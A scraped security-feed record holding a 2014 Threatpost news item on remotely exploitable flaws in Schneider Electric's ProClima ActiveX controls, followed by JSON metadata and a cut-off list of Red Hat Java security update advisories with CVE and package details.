Critical Remotely Exploitable Bugs Found in Schneider Electric ProClima Software
2014-12-18T10:58:00
ID CRITICAL-REMOTELY-EXPLOITABLE-BUGS-FOUND-IN-SCHNEIDER-ELECTRIC-PROCLIMA-SOFTWARE/109961 Type threatpost Reporter Dennis Fisher Modified 2014-12-18T15:58:29
Description
There are a number of critical, remotely exploitable command injection vulnerabilities in Schneider Electric’s ProClima software, which is used in manufacturing and energy facilities.
The ProClima application is a utility that customers use to design control panel enclosures in industrial facilities to help manage the heat from enclosed electrical devices. The bugs affect ProClima versions 6.0.1 and earlier, according to an advisory released by ICS-CERT. The flaws exists in two separate components of the ProClia software, MDraw30.ocx and Atx45.ocx.
“MDraw30.ocx control can be initialized and called by malicious scripts potentially causing buffer overflows, which may allow an attacker to execute code remotely,” the advisory says.
The same scenario is true for the vulnerabilities in Atx45.ocx. All of the vulnerabilities can be exploited remotely, and ICS-CERT said that an attacker with relatively low skills would be able to exploit the bugs. There aren’t any known exploits for the vulnerabilities at this point, however.
The vendor has pushed out a new version of the ProClima package that contains fixes for the vulnerabilities.
“Schneider Electric has released an updated version of the ProClima software, Version 6.1.7, which mitigates these vulnerabilities. Customers are encouraged to download the new version and update their installations. It is important that customers first uninstall the current version,” the ICS-CERT advisory says.
The vulnerabilities were reported to Schneider Electric by Ariele Caltabiano, Andrea Micalizzi, and Brian Gorenc through the Zero Day Initiative.
{"viewCount": 2, "id": "CRITICAL-REMOTELY-EXPLOITABLE-BUGS-FOUND-IN-SCHNEIDER-ELECTRIC-PROCLIMA-SOFTWARE/109961", "hash": "0b85c735b29d0f294969a0d56c5ec28ddc056c4eb53cda8292ca19f2b56cdcbf", "description": "There are a number of critical, remotely exploitable command injection vulnerabilities in Schneider Electric\u2019s ProClima software, which is used in manufacturing and energy facilities.\n\nThe ProClima application is a utility that customers use to design control panel enclosures in industrial facilities to help manage the heat from enclosed electrical devices. The bugs affect ProClima versions 6.0.1 and earlier, according to an advisory released by ICS-CERT. The flaws exists in two separate components of the ProClia software, MDraw30.ocx and Atx45.ocx.\n\n\u201cMDraw30.ocx control can be initialized and called by malicious scripts potentially causing buffer overflows, which may allow an attacker to execute code remotely,\u201d the [advisory](<https://ics-cert.us-cert.gov/advisories/ICSA-14-350-01>) says.\n\nThe same scenario is true for the vulnerabilities in Atx45.ocx. All of the vulnerabilities can be exploited remotely, and ICS-CERT said that an attacker with relatively low skills would be able to exploit the bugs. There aren\u2019t any known exploits for the vulnerabilities at this point, however.\n\nThe vendor has pushed out a new version of the ProClima package that contains fixes for the vulnerabilities.\n\n\u201cSchneider Electric has released an updated version of the ProClima software, Version 6.1.7, which mitigates these vulnerabilities. Customers are encouraged to download the new version and update their installations. It is important that customers first uninstall the current version,\u201d the ICS-CERT advisory says.\n\nThe vulnerabilities were reported to Schneider Electric by Ariele Caltabiano, Andrea Micalizzi, and Brian Gorenc through the Zero Day Initiative.", "href": "https://threatpost.com/critical-remotely-exploitable-bugs-found-in-schneider-electric-proclima-software/109961/", "history": [], "edition": 1, "threatPostCategory": "Critical Infrastructure", "cvelist": [], "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-14-350-01"], "modified": "2014-12-18T15:58:29", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "info", "title": "Critical Remotely Exploitable Bugs Found in Schneider Electric ProClima Software", "objectVersion": "1.2", "reporter": "Dennis Fisher", "lastseen": "2016-09-04T20:45:10", "type": "threatpost", "published": "2014-12-18T10:58:00", "enchantments": {"vulnersScore": 7.5}}
{"result": {"redhat": [{"lastseen": "2018-04-23T18:38:22", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "i686", "packageName": "java-1.7.0-oracle", "packageFilename": "java-1.7.0-oracle-1.7.0.181-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.7.0-oracle", "packageFilename": "java-1.7.0-oracle-1.7.0.181-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "i686", "packageName": "java-1.7.0-oracle-devel", "packageFilename": "java-1.7.0-oracle-devel-1.7.0.181-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.7.0-oracle-devel", "packageFilename": "java-1.7.0-oracle-devel-1.7.0.181-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "i686", "packageName": "java-1.7.0-oracle-javafx", "packageFilename": "java-1.7.0-oracle-javafx-1.7.0.181-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.7.0-oracle-javafx", "packageFilename": "java-1.7.0-oracle-javafx-1.7.0.181-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "i686", "packageName": "java-1.7.0-oracle-jdbc", "packageFilename": "java-1.7.0-oracle-jdbc-1.7.0.181-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.7.0-oracle-jdbc", "packageFilename": "java-1.7.0-oracle-jdbc-1.7.0.181-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "i686", "packageName": "java-1.7.0-oracle-plugin", "packageFilename": "java-1.7.0-oracle-plugin-1.7.0.181-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.7.0-oracle-plugin", "packageFilename": "java-1.7.0-oracle-plugin-1.7.0.181-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "i686", "packageName": "java-1.7.0-oracle-src", "packageFilename": "java-1.7.0-oracle-src-1.7.0.181-1jpp.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.0.181-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.7.0-oracle-src", "packageFilename": "java-1.7.0-oracle-src-1.7.0.181-1jpp.1.el6.x86_64.rpm", "operator": "lt"}], "description": "Oracle Java SE version 7 includes the Oracle Java Runtime Environment and the Oracle Java Software Development Kit.\n\nThis update upgrades Oracle Java SE 7 to version 7 Update 181.\n\nSecurity Fix(es):\n\n* OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025) (CVE-2018-2814)\n\n* OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997) (CVE-2018-2794)\n\n* OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977) (CVE-2018-2795)\n\n* OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981) (CVE-2018-2796)\n\n* OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985) (CVE-2018-2797)\n\n* OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989) (CVE-2018-2798)\n\n* OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993) (CVE-2018-2799)\n\n* OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833) (CVE-2018-2800)\n\n* OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757) (CVE-2018-2815)\n\n* OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969) (CVE-2018-2790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T21:10:25", "type": "redhat", "title": "(RHSA-2018:1206) Critical: java-1.7.0-oracle security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-2790", "CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2796", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2799", "CVE-2018-2800", "CVE-2018-2814", "CVE-2018-2815"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T21:12:49", "id": "RHSA-2018:1206", "href": "https://access.redhat.com/errata/RHSA-2018:1206", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T18:38:58", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "i686", "packageName": "java-1.6.0-sun", "packageFilename": "java-1.6.0-sun-1.6.0.191-1jpp.1.el7.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.6.0-sun", "packageFilename": "java-1.6.0-sun-1.6.0.191-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.6.0-sun-demo", "packageFilename": "java-1.6.0-sun-demo-1.6.0.191-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "i686", "packageName": "java-1.6.0-sun-devel", "packageFilename": "java-1.6.0-sun-devel-1.6.0.191-1jpp.1.el7.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.6.0-sun-devel", "packageFilename": "java-1.6.0-sun-devel-1.6.0.191-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.6.0-sun-jdbc", "packageFilename": "java-1.6.0-sun-jdbc-1.6.0.191-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.6.0-sun-plugin", "packageFilename": "java-1.6.0-sun-plugin-1.6.0.191-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.6.0.191-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.6.0-sun-src", "packageFilename": "java-1.6.0-sun-src-1.6.0.191-1jpp.1.el7.x86_64.rpm", "operator": "lt"}], "description": "Oracle Java SE version 6 includes the Oracle Java Runtime Environment and the Oracle Java Software Development Kit.\n\nThis update upgrades Oracle Java SE 6 to version 6 Update 191.\n\nSecurity Fix(es):\n\n* OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025) (CVE-2018-2814)\n\n* OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997) (CVE-2018-2794)\n\n* Oracle JDK: unspecified vulnerability fixed in 6u191, 7u171, and 8u161 (Security) (CVE-2018-2783)\n\n* OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977) (CVE-2018-2795)\n\n* OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985) (CVE-2018-2797)\n\n* OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989) (CVE-2018-2798)\n\n* OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833) (CVE-2018-2800)\n\n* OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757) (CVE-2018-2815)\n\n* OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969) (CVE-2018-2790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:39:05", "type": "redhat", "title": "(RHSA-2018:1205) Important: java-1.6.0-sun security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-2783", "CVE-2018-2790", "CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2800", "CVE-2018-2814", "CVE-2018-2815"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T21:03:24", "id": "RHSA-2018:1205", "href": "https://access.redhat.com/errata/RHSA-2018:1205", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T18:39:14", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.8.0.171-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.8.0-oracle", "packageFilename": "java-1.8.0-oracle-1.8.0.171-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.8.0.171-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.8.0-oracle-devel", "packageFilename": "java-1.8.0-oracle-devel-1.8.0.171-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.8.0.171-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.8.0-oracle-javafx", "packageFilename": "java-1.8.0-oracle-javafx-1.8.0.171-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.8.0.171-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.8.0-oracle-jdbc", "packageFilename": "java-1.8.0-oracle-jdbc-1.8.0.171-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.8.0.171-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.8.0-oracle-plugin", "packageFilename": "java-1.8.0-oracle-plugin-1.8.0.171-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.8.0.171-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.8.0-oracle-src", "packageFilename": "java-1.8.0-oracle-src-1.8.0.171-1jpp.1.el7.x86_64.rpm", "operator": "lt"}], "description": "Oracle Java SE version 8 includes the Oracle Java Runtime Environment and the Oracle Java Software Development Kit.\n\nThis update upgrades Oracle Java SE 8 to version 8 Update 171.\n\nSecurity Fix(es):\n\n* OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025) (CVE-2018-2814)\n\n* OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997) (CVE-2018-2794)\n\n* Oracle JDK: unspecified vulnerability fixed in 8u171 and 10.0.1 (Install) (CVE-2018-2811)\n\n* OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977) (CVE-2018-2795)\n\n* OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981) (CVE-2018-2796)\n\n* OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985) (CVE-2018-2797)\n\n* OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989) (CVE-2018-2798)\n\n* OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993) (CVE-2018-2799)\n\n* OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833) (CVE-2018-2800)\n\n* OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757) (CVE-2018-2815)\n\n* OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969) (CVE-2018-2790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:37:32", "type": "redhat", "title": "(RHSA-2018:1204) Critical: java-1.8.0-oracle security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-2790", "CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2796", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2799", "CVE-2018-2800", "CVE-2018-2811", "CVE-2018-2814", "CVE-2018-2815"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T21:03:25", "id": "RHSA-2018:1204", "href": "https://access.redhat.com/errata/RHSA-2018:1204", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T18:39:19", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-sun", "packageFilename": "java-1.6.0-sun-1.6.0.191-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun", "packageFilename": "java-1.6.0-sun-1.6.0.191-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-sun-demo", "packageFilename": "java-1.6.0-sun-demo-1.6.0.191-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-demo", "packageFilename": "java-1.6.0-sun-demo-1.6.0.191-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-sun-devel", "packageFilename": "java-1.6.0-sun-devel-1.6.0.191-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-devel", "packageFilename": "java-1.6.0-sun-devel-1.6.0.191-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-sun-jdbc", "packageFilename": "java-1.6.0-sun-jdbc-1.6.0.191-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-jdbc", "packageFilename": "java-1.6.0-sun-jdbc-1.6.0.191-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-sun-plugin", "packageFilename": "java-1.6.0-sun-plugin-1.6.0.191-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-plugin", "packageFilename": "java-1.6.0-sun-plugin-1.6.0.191-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-sun-src", "packageFilename": "java-1.6.0-sun-src-1.6.0.191-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.191-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-sun-src", "packageFilename": "java-1.6.0-sun-src-1.6.0.191-1jpp.2.el6.x86_64.rpm", "operator": "lt"}], "description": "Oracle Java SE version 6 includes the Oracle Java Runtime Environment and the Oracle Java Software Development Kit.\n\nThis update upgrades Oracle Java SE 6 to version 6 Update 191.\n\nSecurity Fix(es):\n\n* OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025) (CVE-2018-2814)\n\n* OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997) (CVE-2018-2794)\n\n* Oracle JDK: unspecified vulnerability fixed in 6u191, 7u171, and 8u161 (Security) (CVE-2018-2783)\n\n* OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977) (CVE-2018-2795)\n\n* OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985) (CVE-2018-2797)\n\n* OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989) (CVE-2018-2798)\n\n* OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833) (CVE-2018-2800)\n\n* OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757) (CVE-2018-2815)\n\n* OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969) (CVE-2018-2790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:35:28", "type": "redhat", "title": "(RHSA-2018:1203) Important: java-1.6.0-sun security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-2783", "CVE-2018-2790", "CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2800", "CVE-2018-2814", "CVE-2018-2815"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T20:59:08", "id": "RHSA-2018:1203", "href": "https://access.redhat.com/errata/RHSA-2018:1203", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T18:39:30", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "i686", "packageName": "java-1.8.0-oracle", "packageFilename": "java-1.8.0-oracle-1.8.0.171-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.8.0-oracle", "packageFilename": "java-1.8.0-oracle-1.8.0.171-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "i686", "packageName": "java-1.8.0-oracle-devel", "packageFilename": "java-1.8.0-oracle-devel-1.8.0.171-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.8.0-oracle-devel", "packageFilename": "java-1.8.0-oracle-devel-1.8.0.171-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "i686", "packageName": "java-1.8.0-oracle-javafx", "packageFilename": "java-1.8.0-oracle-javafx-1.8.0.171-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.8.0-oracle-javafx", "packageFilename": "java-1.8.0-oracle-javafx-1.8.0.171-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "i686", "packageName": "java-1.8.0-oracle-jdbc", "packageFilename": "java-1.8.0-oracle-jdbc-1.8.0.171-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.8.0-oracle-jdbc", "packageFilename": "java-1.8.0-oracle-jdbc-1.8.0.171-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "i686", "packageName": "java-1.8.0-oracle-plugin", "packageFilename": "java-1.8.0-oracle-plugin-1.8.0.171-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.8.0-oracle-plugin", "packageFilename": "java-1.8.0-oracle-plugin-1.8.0.171-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "i686", "packageName": "java-1.8.0-oracle-src", "packageFilename": "java-1.8.0-oracle-src-1.8.0.171-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.8.0.171-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.8.0-oracle-src", "packageFilename": "java-1.8.0-oracle-src-1.8.0.171-1jpp.2.el6.x86_64.rpm", "operator": "lt"}], "description": "Oracle Java SE version 8 includes the Oracle Java Runtime Environment and the Oracle Java Software Development Kit.\n\nThis update upgrades Oracle Java SE 8 to version 8 Update 171.\n\nSecurity Fix(es):\n\n* OpenJDK: incorrect handling of Reference clones can lead to sandbox bypass (Hotspot, 8192025) (CVE-2018-2814)\n\n* OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997) (CVE-2018-2794)\n\n* Oracle JDK: unspecified vulnerability fixed in 8u171 and 10.0.1 (Install) (CVE-2018-2811)\n\n* OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977) (CVE-2018-2795)\n\n* OpenJDK: unbounded memory allocation during deserialization in PriorityBlockingQueue (Concurrency, 8189981) (CVE-2018-2796)\n\n* OpenJDK: unbounded memory allocation during deserialization in TabularDataSupport (JMX, 8189985) (CVE-2018-2797)\n\n* OpenJDK: unbounded memory allocation during deserialization in Container (AWT, 8189989) (CVE-2018-2798)\n\n* OpenJDK: unbounded memory allocation during deserialization in NamedNodeMapImpl (JAXP, 8189993) (CVE-2018-2799)\n\n* OpenJDK: RMI HTTP transport enabled by default (RMI, 8193833) (CVE-2018-2800)\n\n* OpenJDK: unbounded memory allocation during deserialization in StubIORImpl (Serialization, 8192757) (CVE-2018-2815)\n\n* OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969) (CVE-2018-2790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-04-23T20:34:56", "type": "redhat", "title": "(RHSA-2018:1202) Critical: java-1.8.0-oracle security update", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-2790", "CVE-2018-2794", "CVE-2018-2795", "CVE-2018-2796", "CVE-2018-2797", "CVE-2018-2798", "CVE-2018-2799", "CVE-2018-2800", "CVE-2018-2811", "CVE-2018-2814", "CVE-2018-2815"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-04-23T20:59:10", "id": "RHSA-2018:1202", "href": "https://access.redhat.com/errata/RHSA-2018:1202", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-23T18:38:21", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "i686", "packageName": "java-1.7.0-oracle", "packageFilename": "java-1.7.0-oracle-1.7.0.181-1jpp.1.el7.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.7.0-oracle", "packageFilename": "java-1.7.0-oracle-1.7.0.181-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "i686", "packageName": "java-1.7.0-oracle-devel", "packageFilename": "java-1.7.0-oracle-devel-1.7.0.181-1jpp.1.el7.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.7.0-oracle-devel", "packageFilename": "java-1.7.0-oracle-devel-1.7.0.181-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.7.0-oracle-javafx", "packageFilename": "java-1.7.0-oracle-javafx-1.7.0.181-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.7.0-oracle-jdbc", "packageFilename": "java-1.7.0-oracle-jdbc-1.7.0.181-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.0.181-1jpp.1.el7", "arch": "x86_64", "packageName": "java-1.7.0-oracle-plugin", "packageFilename": "java-1.7.0-oracle-plugin-1.7.0.181-1jpp.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": 